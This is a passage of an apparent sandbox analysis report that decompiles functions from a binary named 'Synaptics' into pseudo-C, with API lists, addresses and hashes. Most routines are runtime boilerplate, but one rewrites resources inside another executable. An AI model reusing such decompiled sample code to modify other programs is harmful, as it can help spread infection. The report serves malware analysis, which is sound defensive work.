					} else {
						_v780 =  *((intOrPtr*)( *((intOrPtr*)(_v776 + 8))));
					}
					_v788 =  *_v780 & 0x0000ffff;
					_t79 = _v788 - 1;
					if(_t79 >= 0) {
						_t85 = _t79 + 1;
						_t96 = 0;
						_t97 =  &_v772;
						do {
							_v796 = _t97;
							_push(_v796 + 4);
							_t22 = _t96 + 1; // 0x1
							_push(_v780);
							L0040F78C();
							E00410638(_v780);
							_push( &_v784);
							_t25 = _t96 + 1; // 0x1
							_push(_v780);
							L0040F794();
							E00410638(_v780);
							 *_v796 = _v784 -  *((intOrPtr*)(_v796 + 4)) + 1;
							_t96 = _t96 + 1;
							_t97 = _t97 + 8;
							_t85 = _t85 - 1;
						} while (_t85 != 0);
					}
					_t81 = _v788 - 1;
					if(_t81 >= 0) {
						_t84 = _t81 + 1;
						_t60 =  &_v768;
						_t92 =  &_v260;
						do {
							 *_t92 =  *_t60;
							_t92 = _t92 + 4;
							_t60 = _t60 + 8;
							_t84 = _t84 - 1;
						} while (_t84 != 0);
						do {
							goto L12;
						} while (E00410794(_t83, _t98) != 0);
						goto L15;
					}
					L12:
					_t83 = _v788 - 1;
					if(E00410764(_v788 - 1, _t98) != 0) {
						_push( &_v792);
						_push( &_v260);
						_push(_v780);
						L0040F79C();
						E00410638(_v780);
						E004109E8(_v792);
					}
				}
				L15:
				_push(_v776);
				L0040F320();
				return E00410638(_v776);
			}






















                                                                                                                                                                                                                            0x004107fc
                                                                                                                                                                                                                            0x0041080c
                                                                                                                                                                                                                            0x00410813
                                                                                                                                                                                                                            0x00410813
                                                                                                                                                                                                                            0x0041081e
                                                                                                                                                                                                                            0x0041082c
                                                                                                                                                                                                                            0x0041083b
                                                                                                                                                                                                                            0x00410859
                                                                                                                                                                                                                            0x0041083d
                                                                                                                                                                                                                            0x00410848
                                                                                                                                                                                                                            0x00410848
                                                                                                                                                                                                                            0x00410868
                                                                                                                                                                                                                            0x00410874
                                                                                                                                                                                                                            0x00410877
                                                                                                                                                                                                                            0x00410879
                                                                                                                                                                                                                            0x0041087a
                                                                                                                                                                                                                            0x0041087c
                                                                                                                                                                                                                            0x00410882
                                                                                                                                                                                                                            0x00410884
                                                                                                                                                                                                                            0x00410893
                                                                                                                                                                                                                            0x00410894
                                                                                                                                                                                                                            0x0041089e
                                                                                                                                                                                                                            0x0041089f
                                                                                                                                                                                                                            0x004108a4
                                                                                                                                                                                                                            0x004108af
                                                                                                                                                                                                                            0x004108b0
                                                                                                                                                                                                                            0x004108ba
                                                                                                                                                                                                                            0x004108bb
                                                                                                                                                                                                                            0x004108c0
                                                                                                                                                                                                                            0x004108db
                                                                                                                                                                                                                            0x004108dd
                                                                                                                                                                                                                            0x004108de
                                                                                                                                                                                                                            0x004108e1
                                                                                                                                                                                                                            0x004108e1
                                                                                                                                                                                                                            0x00410882
                                                                                                                                                                                                                            0x004108ea
                                                                                                                                                                                                                            0x004108ed
                                                                                                                                                                                                                            0x004108ef
                                                                                                                                                                                                                            0x004108f0
                                                                                                                                                                                                                            0x004108f6
                                                                                                                                                                                                                            0x004108fc
                                                                                                                                                                                                                            0x004108fe
                                                                                                                                                                                                                            0x00410900
                                                                                                                                                                                                                            0x00410903
                                                                                                                                                                                                                            0x00410906
                                                                                                                                                                                                                            0x00410906
                                                                                                                                                                                                                            0x00410909
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00410909
                                                                                                                                                                                                                            0x00410909
                                                                                                                                                                                                                            0x00410910
                                                                                                                                                                                                                            0x0041091b
                                                                                                                                                                                                                            0x00410923
                                                                                                                                                                                                                            0x0041092a
                                                                                                                                                                                                                            0x00410931
                                                                                                                                                                                                                            0x00410932
                                                                                                                                                                                                                            0x00410937
                                                                                                                                                                                                                            0x00410942
                                                                                                                                                                                                                            0x00410942
                                                                                                                                                                                                                            0x00410950
                                                                                                                                                                                                                            0x00410954
                                                                                                                                                                                                                            0x0041095a
                                                                                                                                                                                                                            0x0041095b
                                                                                                                                                                                                                            0x0041096b

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0041089F
                                                                                                                                                                                                                            • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 004108BB
                                                                                                                                                                                                                            • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 00410932
                                                                                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 0041095B
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ArraySafe$Bound$ClearIndexVariant
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 920484758-0
                                                                                                                                                                                                                            • Opcode ID: f4434b3e376d3a5606270c734a293c14b68a231df54e7596f913469bd8c2ca55
                                                                                                                                                                                                                            • Instruction ID: 03341164d2f6fde75e1a46505fe440e945d96e45a0ae1fefe7a635db93ae447a
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f4434b3e376d3a5606270c734a293c14b68a231df54e7596f913469bd8c2ca55
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1D412C75A0121D8FCB61EB59C890AC9B3BCAF48314F0041EAE54CE7202DA78AFC58F54
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00477370 Relevance: 6.1, APIs: 4, Instructions: 104COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 57%
                                                                                                                                                                                                                            			E00477370(intOrPtr __eax, void* __ebx, char __edx, void* __edi, void* __esi) {
				intOrPtr _v8;
				char _v12;
				char _v13;
				long _v20;
				void* _v24;
				struct HINSTANCE__* _t47;
				int _t53;
				char _t56;
				void* _t61;
				struct HINSTANCE__* _t64;
				intOrPtr _t69;
				intOrPtr _t75;
				intOrPtr* _t79;
				void* _t81;
				void* _t82;
				intOrPtr _t83;

				_t81 = _t82;
				_t83 = _t82 + 0xffffffec;
				_v12 = __edx;
				_v8 = __eax;
				E00404E70(_v8);
				E00404E70(_v12);
				_push(_t81);
				_push(0x477494);
				_push( *[fs:eax]);
				 *[fs:eax] = _t83;
				_t61 = BeginUpdateResourceA(E00404E80(_v8), 0);
				_v13 = _t61 != 0;
				if(_v13 == 0) {
					_pop(_t69);
					 *[fs:eax] = _t69;
					_push(E0047749B);
					return E004049E4( &_v12, 2);
				} else {
					 *[fs:eax] = _t83;
					_t64 =  *0x49ec78; // 0x3c30000
					_t79 = E0041E0D0(_t64, 1, 0xa, _v12);
					_v20 =  *((intOrPtr*)( *_t79))( *[fs:eax], 0x477472, _t81);
					_v24 = E0040275C( *((intOrPtr*)( *_t79))());
					 *((intOrPtr*)( *_t79 + 0xc))();
					E00403BEC(_t79);
					_t47 =  *0x49ec78; // 0x3c30000
					FreeLibrary(_t47);
					_t53 = UpdateResourceA(_t61, 0xa, E00404E80(_v12), 0, _v24, _v20);
					asm("sbb eax, eax");
					_v13 = _t53 + 1;
					if(EndUpdateResourceA(_t61, 0) == 0 || _v13 == 0) {
						_t56 = 0;
					} else {
						_t56 = 1;
					}
					_v13 = _t56;
					_pop(_t75);
					 *[fs:eax] = _t75;
					_push(E00477479);
					return E0040277C(_v24);
				}
			}



















                                                                                                                                                                                                                            0x00477371
                                                                                                                                                                                                                            0x00477373
                                                                                                                                                                                                                            0x00477379
                                                                                                                                                                                                                            0x0047737c
                                                                                                                                                                                                                            0x00477382
                                                                                                                                                                                                                            0x0047738a
                                                                                                                                                                                                                            0x00477391
                                                                                                                                                                                                                            0x00477392
                                                                                                                                                                                                                            0x00477397
                                                                                                                                                                                                                            0x0047739a
                                                                                                                                                                                                                            0x004773ad
                                                                                                                                                                                                                            0x004773b1
                                                                                                                                                                                                                            0x004773b9
                                                                                                                                                                                                                            0x0047747b
                                                                                                                                                                                                                            0x0047747e
                                                                                                                                                                                                                            0x00477481
                                                                                                                                                                                                                            0x00477493
                                                                                                                                                                                                                            0x004773bf
                                                                                                                                                                                                                            0x004773ca
                                                                                                                                                                                                                            0x004773d3
                                                                                                                                                                                                                            0x004773e5
                                                                                                                                                                                                                            0x004773ed
                                                                                                                                                                                                                            0x004773fb
                                                                                                                                                                                                                            0x00477408
                                                                                                                                                                                                                            0x0047740d
                                                                                                                                                                                                                            0x00477412
                                                                                                                                                                                                                            0x00477418
                                                                                                                                                                                                                            0x00477433
                                                                                                                                                                                                                            0x0047743b
                                                                                                                                                                                                                            0x0047743e
                                                                                                                                                                                                                            0x0047744b
                                                                                                                                                                                                                            0x00477453
                                                                                                                                                                                                                            0x00477457
                                                                                                                                                                                                                            0x00477457
                                                                                                                                                                                                                            0x00477457
                                                                                                                                                                                                                            0x00477459
                                                                                                                                                                                                                            0x0047745e
                                                                                                                                                                                                                            0x00477461
                                                                                                                                                                                                                            0x00477464
                                                                                                                                                                                                                            0x00477471
                                                                                                                                                                                                                            0x00477471

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • BeginUpdateResourceA.KERNEL32 ref: 004773A8
                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(03C30000,?,?,00000000,00000000,00000000,00477494,?,?,?,00000000), ref: 00477418
                                                                                                                                                                                                                            • UpdateResourceA.KERNEL32 ref: 00477433
                                                                                                                                                                                                                            • EndUpdateResourceA.KERNEL32 ref: 00477444
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ResourceUpdate$BeginFreeLibrary
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2368538523-0
                                                                                                                                                                                                                            • Opcode ID: 59e7414658dc091205167fef12b51b4d7f9389589d3a1839c4c82dc7da055082
                                                                                                                                                                                                                            • Instruction ID: 788fa2fdaf6e603f0e993ca8ed72eb25dca608fc93a6157178922b6ccb5e32dc
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 59e7414658dc091205167fef12b51b4d7f9389589d3a1839c4c82dc7da055082
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 66317270B04205AFD701EBB9DC41BAEBBB9EB49704F5084BAF504F7291DA79AD00C799
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0040CED0 Relevance: 6.1, APIs: 4, Instructions: 102COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E0040CED0(intOrPtr* __eax, intOrPtr __ecx, void* __edx, void* __fp0, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v273;
				char _v534;
				char _v790;
				struct _MEMORY_BASIC_INFORMATION _v820;
				char _v824;
				intOrPtr _v828;
				char _v832;
				intOrPtr _v836;
				char _v840;
				intOrPtr _v844;
				char _v848;
				char* _v852;
				char _v856;
				char _v860;
				char _v1116;
				void* __edi;
				struct HINSTANCE__* _t40;
				intOrPtr _t51;
				struct HINSTANCE__* _t53;
				void* _t69;
				void* _t73;
				intOrPtr _t74;
				intOrPtr _t83;
				intOrPtr _t86;
				intOrPtr* _t87;
				void* _t93;

				_t93 = __fp0;
				_v8 = __ecx;
				_t73 = __edx;
				_t87 = __eax;
				VirtualQuery(__edx,  &_v820, 0x1c);
				if(_v820.State != 0x1000 || GetModuleFileNameA(_v820.AllocationBase,  &_v534, 0x105) == 0) {
					_t40 =  *0x49e668; // 0x400000
					GetModuleFileNameA(_t40,  &_v534, 0x105);
					_v12 = E0040CEC4(_t73);
				} else {
					_v12 = _t73 - _v820.AllocationBase;
				}
				E00409FEC( &_v273, 0x104, E0040E020(0x5c) + 1);
				_t74 = 0x40d050;
				_t86 = 0x40d050;
				_t83 =  *0x408034; // 0x408080
				if(E00403D78(_t87, _t83) != 0) {
					_t74 = E00404E80( *((intOrPtr*)(_t87 + 4)));
					_t69 = E00409F88(_t74, 0x40d050);
					if(_t69 != 0 &&  *((char*)(_t74 + _t69 - 1)) != 0x2e) {
						_t86 = 0x40d054;
					}
				}
				_t51 =  *0x49ddfc; // 0x407dac
				_t16 = _t51 + 4; // 0xffd1
				_t53 =  *0x49e668; // 0x400000
				LoadStringA(E00405FDC(_t53),  *_t16,  &_v790, 0x100);
				E00403B3C( *_t87,  &_v1116);
				_v860 =  &_v1116;
				_v856 = 4;
				_v852 =  &_v273;
				_v848 = 6;
				_v844 = _v12;
				_v840 = 5;
				_v836 = _t74;
				_v832 = 6;
				_v828 = _t86;
				_v824 = 6;
				E0040A624(_v8,  &_v790, _a4, _t93, "true",  &_v860);
				return E00409F88(_v8, _t86);
			}































                                                                                                                                                                                                                            0x0040ced0
                                                                                                                                                                                                                            0x0040cedc
                                                                                                                                                                                                                            0x0040cedf
                                                                                                                                                                                                                            0x0040cee1
                                                                                                                                                                                                                            0x0040ceed
                                                                                                                                                                                                                            0x0040cefc
                                                                                                                                                                                                                            0x0040cf26
                                                                                                                                                                                                                            0x0040cf2c
                                                                                                                                                                                                                            0x0040cf38
                                                                                                                                                                                                                            0x0040cf3d
                                                                                                                                                                                                                            0x0040cf43
                                                                                                                                                                                                                            0x0040cf43
                                                                                                                                                                                                                            0x0040cf61
                                                                                                                                                                                                                            0x0040cf66
                                                                                                                                                                                                                            0x0040cf6b
                                                                                                                                                                                                                            0x0040cf72
                                                                                                                                                                                                                            0x0040cf7f
                                                                                                                                                                                                                            0x0040cf89
                                                                                                                                                                                                                            0x0040cf8d
                                                                                                                                                                                                                            0x0040cf94
                                                                                                                                                                                                                            0x0040cf9d
                                                                                                                                                                                                                            0x0040cf9d
                                                                                                                                                                                                                            0x0040cf94
                                                                                                                                                                                                                            0x0040cfae
                                                                                                                                                                                                                            0x0040cfb3
                                                                                                                                                                                                                            0x0040cfb7
                                                                                                                                                                                                                            0x0040cfc2
                                                                                                                                                                                                                            0x0040cfcf
                                                                                                                                                                                                                            0x0040cfda
                                                                                                                                                                                                                            0x0040cfe0
                                                                                                                                                                                                                            0x0040cfed
                                                                                                                                                                                                                            0x0040cff3
                                                                                                                                                                                                                            0x0040cffd
                                                                                                                                                                                                                            0x0040d003
                                                                                                                                                                                                                            0x0040d00a
                                                                                                                                                                                                                            0x0040d010
                                                                                                                                                                                                                            0x0040d017
                                                                                                                                                                                                                            0x0040d01d
                                                                                                                                                                                                                            0x0040d039
                                                                                                                                                                                                                            0x0040d04c

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040CEED
                                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0040CF11
                                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040CF2C
                                                                                                                                                                                                                            • LoadStringA.USER32 ref: 0040CFC2
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3990497365-0
                                                                                                                                                                                                                            • Opcode ID: 29d47073ac724d389526f5602c8458d9e302834d195a018ccc538ee601599d13
                                                                                                                                                                                                                            • Instruction ID: b6cc919b410ec48c376b57bdd6b10f9d41704385299fbac947e4ea08e3070186
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 29d47073ac724d389526f5602c8458d9e302834d195a018ccc538ee601599d13
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BE414270A002589BDB21DB69CC85BDAB7FDAB18305F0441FAA548F7282D7789F84CF59
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0040CECE Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E0040CECE(intOrPtr* __eax, intOrPtr __ecx, void* __edx, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v273;
				char _v534;
				char _v790;
				struct _MEMORY_BASIC_INFORMATION _v820;
				char _v824;
				intOrPtr _v828;
				char _v832;
				intOrPtr _v836;
				char _v840;
				intOrPtr _v844;
				char _v848;
				char* _v852;
				char _v856;
				char _v860;
				char _v1116;
				void* __edi;
				struct HINSTANCE__* _t40;
				intOrPtr _t51;
				struct HINSTANCE__* _t53;
				void* _t69;
				void* _t74;
				intOrPtr _t75;
				intOrPtr _t85;
				intOrPtr _t89;
				intOrPtr* _t92;
				void* _t105;

				_v8 = __ecx;
				_t74 = __edx;
				_t92 = __eax;
				VirtualQuery(__edx,  &_v820, 0x1c);
				if(_v820.State != 0x1000 || GetModuleFileNameA(_v820.AllocationBase,  &_v534, 0x105) == 0) {
					_t40 =  *0x49e668; // 0x400000
					GetModuleFileNameA(_t40,  &_v534, 0x105);
					_v12 = E0040CEC4(_t74);
				} else {
					_v12 = _t74 - _v820.AllocationBase;
				}
				E00409FEC( &_v273, 0x104, E0040E020(0x5c) + 1);
				_t75 = 0x40d050;
				_t89 = 0x40d050;
				_t85 =  *0x408034; // 0x408080
				if(E00403D78(_t92, _t85) != 0) {
					_t75 = E00404E80( *((intOrPtr*)(_t92 + 4)));
					_t69 = E00409F88(_t75, 0x40d050);
					if(_t69 != 0 &&  *((char*)(_t75 + _t69 - 1)) != 0x2e) {
						_t89 = 0x40d054;
					}
				}
				_t51 =  *0x49ddfc; // 0x407dac
				_t16 = _t51 + 4; // 0xffd1
				_t53 =  *0x49e668; // 0x400000
				LoadStringA(E00405FDC(_t53),  *_t16,  &_v790, 0x100);
				E00403B3C( *_t92,  &_v1116);
				_v860 =  &_v1116;
				_v856 = 4;
				_v852 =  &_v273;
				_v848 = 6;
				_v844 = _v12;
				_v840 = 5;
				_v836 = _t75;
				_v832 = 6;
				_v828 = _t89;
				_v824 = 6;
				E0040A624(_v8,  &_v790, _a4, _t105, "true",  &_v860);
				return E00409F88(_v8, _t89);
			}































                                                                                                                                                                                                                            0x0040cedc
                                                                                                                                                                                                                            0x0040cedf
                                                                                                                                                                                                                            0x0040cee1
                                                                                                                                                                                                                            0x0040ceed
                                                                                                                                                                                                                            0x0040cefc
                                                                                                                                                                                                                            0x0040cf26
                                                                                                                                                                                                                            0x0040cf2c
                                                                                                                                                                                                                            0x0040cf38
                                                                                                                                                                                                                            0x0040cf3d
                                                                                                                                                                                                                            0x0040cf43
                                                                                                                                                                                                                            0x0040cf43
                                                                                                                                                                                                                            0x0040cf61
                                                                                                                                                                                                                            0x0040cf66
                                                                                                                                                                                                                            0x0040cf6b
                                                                                                                                                                                                                            0x0040cf72
                                                                                                                                                                                                                            0x0040cf7f
                                                                                                                                                                                                                            0x0040cf89
                                                                                                                                                                                                                            0x0040cf8d
                                                                                                                                                                                                                            0x0040cf94
                                                                                                                                                                                                                            0x0040cf9d
                                                                                                                                                                                                                            0x0040cf9d
                                                                                                                                                                                                                            0x0040cf94
                                                                                                                                                                                                                            0x0040cfae
                                                                                                                                                                                                                            0x0040cfb3
                                                                                                                                                                                                                            0x0040cfb7
                                                                                                                                                                                                                            0x0040cfc2
                                                                                                                                                                                                                            0x0040cfcf
                                                                                                                                                                                                                            0x0040cfda
                                                                                                                                                                                                                            0x0040cfe0
                                                                                                                                                                                                                            0x0040cfed
                                                                                                                                                                                                                            0x0040cff3
                                                                                                                                                                                                                            0x0040cffd
                                                                                                                                                                                                                            0x0040d003
                                                                                                                                                                                                                            0x0040d00a
                                                                                                                                                                                                                            0x0040d010
                                                                                                                                                                                                                            0x0040d017
                                                                                                                                                                                                                            0x0040d01d
                                                                                                                                                                                                                            0x0040d039
                                                                                                                                                                                                                            0x0040d04c

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040CEED
                                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0040CF11
                                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040CF2C
                                                                                                                                                                                                                            • LoadStringA.USER32 ref: 0040CFC2
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3990497365-0
                                                                                                                                                                                                                            • Opcode ID: b82e1068cabe4ae57284531c3d153d5948e774c07b80ca1a7813b77d5b851ce1
                                                                                                                                                                                                                            • Instruction ID: 4fe94cffe00b8ae50479b7d7830d31852d6d04f91b779ba97ffbb5203982a357
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b82e1068cabe4ae57284531c3d153d5948e774c07b80ca1a7813b77d5b851ce1
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 70415270A002589BDB21DB59CC85BDAB7FD9B18305F0441FAB548F7282D7789F88CB59
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0040E174 Relevance: 6.1, APIs: 4, Instructions: 95threadCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E0040E174() {
				char _v152;
				short _v410;
				signed short _t14;
				signed int _t16;
				int _t18;
				void* _t20;
				void* _t23;
				int _t24;
				int _t26;
				signed int _t30;
				signed int _t31;
				signed int _t32;
				signed int _t37;
				int* _t39;
				short* _t41;
				void* _t49;

				 *0x49e744 = 0x409;
				 *0x49e748 = 9;
				 *0x49e74c = 1;
				_t14 = GetThreadLocale();
				if(_t14 != 0) {
					 *0x49e744 = _t14;
				}
				if(_t14 != 0) {
					 *0x49e748 = _t14 & 0x3ff;
					 *0x49e74c = (_t14 & 0x0000ffff) >> 0xa;
				}
				memcpy(0x49b134, 0x40e2c8, 8 << 2);
				if( *0x49b0ec != 2) {
					_t16 = GetSystemMetrics(0x4a);
					__eflags = _t16;
					 *0x49e751 = _t16 & 0xffffff00 | _t16 != 0x00000000;
					_t18 = GetSystemMetrics(0x2a);
					__eflags = _t18;
					_t31 = _t30 & 0xffffff00 | _t18 != 0x00000000;
					 *0x49e750 = _t31;
					__eflags = _t31;
					if(__eflags != 0) {
						return E0040E0FC(__eflags, _t49);
					}
				} else {
					_t20 = E0040E15C();
					if(_t20 != 0) {
						 *0x49e751 = 0;
						 *0x49e750 = 0;
						return _t20;
					}
					E0040E0FC(__eflags, _t49);
					_t37 = 0x20;
					_t23 = E00403718(0x49b134, 0x20, 0x40e2c8);
					_t32 = _t30 & 0xffffff00 | __eflags != 0x00000000;
					 *0x49e750 = _t32;
					__eflags = _t32;
					if(_t32 != 0) {
						 *0x49e751 = 0;
						return _t23;
					}
					_t24 = 0x80;
					_t39 =  &_v152;
					do {
						 *_t39 = _t24;
						_t24 = _t24 + 1;
						_t39 =  &(_t39[0]);
						__eflags = _t24 - 0x100;
					} while (_t24 != 0x100);
					_t26 =  *0x49e744; // 0x409
					GetStringTypeA(_t26, 2,  &_v152, 0x80,  &_v410);
					_t18 = 0x80;
					_t41 =  &_v410;
					while(1) {
						__eflags =  *_t41 - 2;
						_t37 = _t37 & 0xffffff00 |  *_t41 == 0x00000002;
						 *0x49e751 = _t37;
						__eflags = _t37;
						if(_t37 != 0) {
							goto L17;
						}
						_t41 = _t41 + 2;
						_t18 = _t18 - 1;
						__eflags = _t18;
						if(_t18 != 0) {
							continue;
						} else {
							return _t18;
						}
						L18:
					}
				}
				L17:
				return _t18;
				goto L18;
			}



















                                                                                                                                                                                                                            0x0040e180
                                                                                                                                                                                                                            0x0040e18a
                                                                                                                                                                                                                            0x0040e194
                                                                                                                                                                                                                            0x0040e19e
                                                                                                                                                                                                                            0x0040e1a5
                                                                                                                                                                                                                            0x0040e1a7
                                                                                                                                                                                                                            0x0040e1a7
                                                                                                                                                                                                                            0x0040e1af
                                                                                                                                                                                                                            0x0040e1bb
                                                                                                                                                                                                                            0x0040e1c7
                                                                                                                                                                                                                            0x0040e1c7
                                                                                                                                                                                                                            0x0040e1db
                                                                                                                                                                                                                            0x0040e1e4
                                                                                                                                                                                                                            0x0040e293
                                                                                                                                                                                                                            0x0040e298
                                                                                                                                                                                                                            0x0040e29d
                                                                                                                                                                                                                            0x0040e2a4
                                                                                                                                                                                                                            0x0040e2a9
                                                                                                                                                                                                                            0x0040e2ab
                                                                                                                                                                                                                            0x0040e2ae
                                                                                                                                                                                                                            0x0040e2b4
                                                                                                                                                                                                                            0x0040e2b6
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040e2be
                                                                                                                                                                                                                            0x0040e1ea
                                                                                                                                                                                                                            0x0040e1ea
                                                                                                                                                                                                                            0x0040e1f1
                                                                                                                                                                                                                            0x0040e1f3
                                                                                                                                                                                                                            0x0040e1fa
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040e1fa
                                                                                                                                                                                                                            0x0040e207
                                                                                                                                                                                                                            0x0040e217
                                                                                                                                                                                                                            0x0040e219
                                                                                                                                                                                                                            0x0040e21e
                                                                                                                                                                                                                            0x0040e221
                                                                                                                                                                                                                            0x0040e227
                                                                                                                                                                                                                            0x0040e229
                                                                                                                                                                                                                            0x0040e22b
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040e22b
                                                                                                                                                                                                                            0x0040e237
                                                                                                                                                                                                                            0x0040e23c
                                                                                                                                                                                                                            0x0040e242
                                                                                                                                                                                                                            0x0040e242
                                                                                                                                                                                                                            0x0040e244
                                                                                                                                                                                                                            0x0040e245
                                                                                                                                                                                                                            0x0040e246
                                                                                                                                                                                                                            0x0040e246
                                                                                                                                                                                                                            0x0040e262
                                                                                                                                                                                                                            0x0040e268
                                                                                                                                                                                                                            0x0040e26d
                                                                                                                                                                                                                            0x0040e272
                                                                                                                                                                                                                            0x0040e278
                                                                                                                                                                                                                            0x0040e278
                                                                                                                                                                                                                            0x0040e27c
                                                                                                                                                                                                                            0x0040e27f
                                                                                                                                                                                                                            0x0040e285
                                                                                                                                                                                                                            0x0040e287
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040e289
                                                                                                                                                                                                                            0x0040e28c
                                                                                                                                                                                                                            0x0040e28c
                                                                                                                                                                                                                            0x0040e28d
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040e28d
